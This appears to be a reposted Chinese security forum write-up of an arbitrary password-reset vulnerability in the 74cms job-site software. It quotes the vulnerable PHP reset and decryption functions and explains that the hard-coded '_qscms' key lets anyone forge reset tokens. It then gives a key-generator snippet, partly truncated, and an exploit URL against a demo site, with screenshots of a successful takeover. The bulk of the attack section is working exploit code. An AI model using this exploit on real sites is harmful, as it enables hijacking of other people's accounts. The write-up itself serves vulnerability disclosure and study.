74cms任意用户密码修改

from [[90sec]][10310] [10310]: https://forum.90sec.org/forum.php?mod=viewthread&tid=10310 "90sec" 这个任意用户密码修改比较垃圾,随便讲一下 ```php public function user_setpass(){ if(IS_POST){ $retrievePassword = session('retrievePassword'); if($retrievePassword['token'] != I('post.token','','trim')) $this->error('非法参数!'); $user['password']=I('post.password','','trim,badword'); !$user['password'] && $this->error('请输入新密码!'); if($user['password'] != I('post.password1','','trim,badword')) $this->error('两次输入密码不相同,请重新输入!'); $passport = $this->_user_server(); if(false === $uid = $passport->edit($retrievePassword['uid'],$user)) $this->error($passport->get_error()); $tpl = 'user_setpass_sucess'; session('retrievePassword',null); }else{ parse_str(decrypt(I('get.key','','trim')),$data); !fieldRegex($data['e'],'email') && $this->error('找回密码失败,邮箱格式错误!','user_getpass'); $end_time=$data['t']+24*3600; if($end_timeerror('找回密码失败,链接过期!','user_getpass'); $key_str=substr(md5($data['e'].$data['t']),8,16); if($key_str!=$data['k']) $this->error('找回密码失败,key错误!','user_getpass'); if(!$uid = M('Members')->where(array('email'=>$data['e']))->getfield('uid')) $this->error('找回密码失败,帐号不存在!','user_getpass'); $token=substr(md5(mt_rand(100000, 999999)), 8,16); session('retrievePassword',array('uid'=>$uid,'token'=>$token)); $this->assign('token',$token); } $this->_config_seo(array('title'=>'找回密码 - '.C('qscms_site_name'))); $this->display($tpl); } ``` 这里解密是用的decrypt函数,进去看一下: ```php function decrypt($txt, $key = '_qscms') { $txt = passport_key(base64_decode($txt), $key); $tmp = ''; for ($i = 0; $i < strlen($txt); $i++) { $tmp .= $txt[$i] ^ $txt[++$i]; } return $tmp; } function passport_key($txt, $encrypt_key) { $encrypt_key = md5($encrypt_key); $ctr = 0; $tmp = ''; for($i = 0; $i < strlen($txt); $i++) { $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr; $tmp .= $txt[$i] ^ $encrypt_key[$ctr++]; } return $tmp; } ``` 默认密钥位_qscms,而且写死了,调用时没有传入。 所以,这里存在任意用户密码修改漏洞。 编写如下生成代码: ```php $email, 'k'=>substr(md5($email.'9487070991'),8,16),'t'=>'9487070991']))); ``` 获取key并替换到url中,可见这里直接可以修改用户example@xxx.com的密码了: ``` http://demo1.7yun.com//index.php?m=&c=members&a=user_setpass&key=$key ``` ![](http://0day5.com/usr/uploads/2017/02/2444011266.png) 修改密码成功: ![](http://0day5.com/usr/uploads/2017/02/3708859033.png)

发表评论